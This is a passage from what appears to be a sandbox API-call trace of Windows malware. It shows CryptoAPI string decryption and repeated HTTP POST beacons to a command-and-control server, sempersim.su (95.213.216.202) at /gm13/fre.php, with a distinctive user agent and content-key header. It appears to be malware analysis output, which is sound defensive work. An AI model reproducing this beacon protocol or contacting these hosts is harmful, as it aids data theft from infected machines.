(in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b6d8) returned 1 [0104.280] GetProcessHeap () returned 0x620000 [0104.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0104.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.281] CryptImportKey (in: hProv=0x63b6d8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0104.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.282] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0104.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.283] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0104.283] GetProcessHeap () returned 0x620000 [0104.284] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0104.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.285] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f78, pdwDataLen=0x19fcfc | out: pbData=0x642f78, pdwDataLen=0x19fcfc) returned 1 [0104.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.286] CryptDestroyKey (hKey=0x62d710) returned 1 [0104.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0104.287] CryptReleaseContext (hProv=0x63b6d8, dwFlags=0x0) returned 1 [0104.287] GetProcessHeap () returned 0x620000 [0104.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0104.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0104.288] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0104.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0104.289] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0104.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0104.290] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0104.290] GetProcessHeap () returned 0x620000 [0104.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0104.290] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c0f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0104.302] GetProcessHeap () returned 0x620000 [0104.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b630 [0104.302] socket (af=2, type=1, protocol=6) returned 0x290 [0104.302] connect (s=0x290, name=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0104.352] FreeAddrInfoW (pAddrInfo=0x63c0f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0104.352] GetProcessHeap () returned 0x620000 [0104.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0104.353] GetProcessHeap () returned 0x620000 [0104.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0104.353] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0104.354] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0104.354] GetProcessHeap () returned 0x620000 [0104.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0104.354] GetProcessHeap () returned 0x620000 [0104.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0104.355] GetProcessHeap () returned 0x620000 [0104.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643248 [0104.355] GetProcessHeap () returned 0x620000 [0104.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0104.356] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0104.357] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0104.357] GetProcessHeap () returned 0x620000 [0104.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0104.357] GetProcessHeap () returned 0x620000 [0104.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0104.357] send (s=0x290, buf=0x636340*, len=237, flags=0) returned 237 [0104.358] send (s=0x290, buf=0x6421e0*, len=159, flags=0) returned 159 [0104.358] GetProcessHeap () returned 0x620000 [0104.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0104.358] recv (in: s=0x290, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0105.744] GetProcessHeap () returned 0x620000 [0105.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0105.744] GetProcessHeap () returned 0x620000 [0105.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0105.745] GetProcessHeap () returned 0x620000 [0105.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0105.745] GetProcessHeap () returned 0x620000 [0105.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0105.745] closesocket (s=0x290) returned 0 [0105.747] GetProcessHeap () returned 0x620000 [0105.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b630 | out: hHeap=0x620000) returned 1 [0105.747] GetProcessHeap () returned 0x620000 [0105.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0105.747] GetProcessHeap () returned 0x620000 [0105.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f78 | out: hHeap=0x620000) returned 1 [0105.748] GetProcessHeap () returned 0x620000 [0105.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0105.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x119c) returned 0x290 [0105.750] Sleep (dwMilliseconds=0xea60) [0105.760] GetProcessHeap () returned 0x620000 [0105.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6430e0 [0105.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0105.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0105.777] GetProcessHeap () returned 0x620000 [0105.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0105.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.777] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0105.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.778] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0105.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.779] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0105.779] GetProcessHeap () returned 0x620000 [0105.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0105.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.780] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6430e0, pdwDataLen=0x19fcfc | out: pbData=0x6430e0, pdwDataLen=0x19fcfc) returned 1 [0105.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.781] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0105.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.782] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0105.782] GetProcessHeap () returned 0x620000 [0105.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0105.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0105.961] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0105.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0105.962] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0105.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0105.963] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0105.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0105.972] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0105.972] GetProcessHeap () returned 0x620000 [0105.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0105.972] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0105.972] GetProcessHeap () returned 0x620000 [0105.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0105.973] GetProcessHeap () returned 0x620000 [0105.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0105.973] GetProcessHeap () returned 0x620000 [0105.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0105.973] GetProcessHeap () returned 0x620000 [0105.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0105.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.974] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0105.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.992] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0105.999] GetProcessHeap () returned 0x620000 [0105.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0105.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0105.999] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d210) returned 1 [0106.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0106.000] CryptSetKeyParam (hKey=0x62d210, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0106.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0106.001] CryptSetKeyParam (hKey=0x62d210, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0106.001] GetProcessHeap () returned 0x620000 [0106.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0106.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0106.002] CryptDecrypt (in: hKey=0x62d210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0106.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0106.003] CryptDestroyKey (hKey=0x62d210) returned 1 [0106.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0106.004] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0106.004] GetProcessHeap () returned 0x620000 [0106.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0106.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0106.005] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0106.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0106.006] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0106.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0106.007] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0106.007] GetProcessHeap () returned 0x620000 [0106.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0106.007] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebe0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0106.061] GetProcessHeap () returned 0x620000 [0106.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4f0 [0106.061] socket (af=2, type=1, protocol=6) returned 0x294 [0106.061] connect (s=0x294, name=0x63ebe0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0106.115] FreeAddrInfoW (pAddrInfo=0x63c190*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebe0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0106.115] GetProcessHeap () returned 0x620000 [0106.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0106.115] GetProcessHeap () returned 0x620000 [0106.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0106.115] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0106.116] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0106.116] GetProcessHeap () returned 0x620000 [0106.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0106.116] GetProcessHeap () returned 0x620000 [0106.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0106.123] GetProcessHeap () returned 0x620000 [0106.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643128 [0106.123] GetProcessHeap () returned 0x620000 [0106.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0106.124] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0106.125] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0106.125] GetProcessHeap () returned 0x620000 [0106.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0106.125] GetProcessHeap () returned 0x620000 [0106.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0106.126] send (s=0x294, buf=0x636340*, len=237, flags=0) returned 237 [0106.127] send (s=0x294, buf=0x6421e0*, len=159, flags=0) returned 159 [0106.127] GetProcessHeap () returned 0x620000 [0106.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0106.127] recv (in: s=0x294, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0107.718] GetProcessHeap () returned 0x620000 [0107.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0107.718] GetProcessHeap () returned 0x620000 [0107.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0107.719] GetProcessHeap () returned 0x620000 [0107.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0107.719] GetProcessHeap () returned 0x620000 [0107.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0107.720] closesocket (s=0x294) returned 0 [0107.720] GetProcessHeap () returned 0x620000 [0107.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4f0 | out: hHeap=0x620000) returned 1 [0107.720] GetProcessHeap () returned 0x620000 [0107.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0107.720] GetProcessHeap () returned 0x620000 [0107.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0107.721] GetProcessHeap () returned 0x620000 [0107.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0107.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1224) returned 0x294 [0107.722] Sleep (dwMilliseconds=0xea60) [0107.729] GetProcessHeap () returned 0x620000 [0107.729] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435a8 [0107.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.731] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0107.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.736] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0107.742] GetProcessHeap () returned 0x620000 [0107.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0107.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.743] CryptImportKey (in: hProv=0x63ba08, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0107.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.744] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0107.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.749] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0107.749] GetProcessHeap () returned 0x620000 [0107.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0107.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.750] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435a8, pdwDataLen=0x19fcfc | out: pbData=0x6435a8, pdwDataLen=0x19fcfc) returned 1 [0107.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.751] CryptDestroyKey (hKey=0x62d710) returned 1 [0107.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.752] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0107.752] GetProcessHeap () returned 0x620000 [0107.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0107.752] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0107.753] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0107.753] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0107.754] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0107.754] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0107.755] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0107.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0107.756] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0107.756] GetProcessHeap () returned 0x620000 [0107.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0107.756] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0107.756] GetProcessHeap () returned 0x620000 [0107.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0107.756] GetProcessHeap () returned 0x620000 [0107.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0107.757] GetProcessHeap () returned 0x620000 [0107.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435a8 | out: hHeap=0x620000) returned 1 [0107.757] GetProcessHeap () returned 0x620000 [0107.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6433f8 [0107.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0107.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0107.782] GetProcessHeap () returned 0x620000 [0107.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0107.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.783] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0107.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.785] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0107.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.785] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0107.785] GetProcessHeap () returned 0x620000 [0107.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0107.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.787] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6433f8, pdwDataLen=0x19fcfc | out: pbData=0x6433f8, pdwDataLen=0x19fcfc) returned 1 [0107.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.788] CryptDestroyKey (hKey=0x62d710) returned 1 [0107.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0107.789] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0107.789] GetProcessHeap () returned 0x620000 [0107.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 